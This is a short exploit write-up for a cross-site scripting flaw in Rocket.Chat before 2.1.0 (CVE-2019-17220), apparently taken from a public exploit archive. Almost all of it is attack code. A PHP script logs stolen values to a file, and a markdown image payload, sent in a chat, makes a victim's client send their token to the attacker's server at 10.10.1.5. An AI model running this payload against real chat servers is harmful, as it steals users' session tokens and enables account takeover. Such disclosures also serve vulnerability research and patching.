Rocket.Chat 2.1.0 – Cross-Site Scripting

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting

# Author: 3H34N

# Date: 2019-10-22

# Product: Rocket.Chat

# Vendor: https://rocket.chat/

# Vulnerable Version(s): Rocket.Chat < 2.1.0

# CVE: CVE-2019-17220

# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC

# 1. Create l33t.php on a web server

<?php

$output = fopen("logs.txt", "a+") or die("WTF? o.O");

$leet = $_GET['leet']."\n\n";

fwrite($output, $leet);

fclose($output);

# 2. Open a chat session

# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+<code>{}token</code>)

# 4. Token will be written in logs.txt when target seen your message.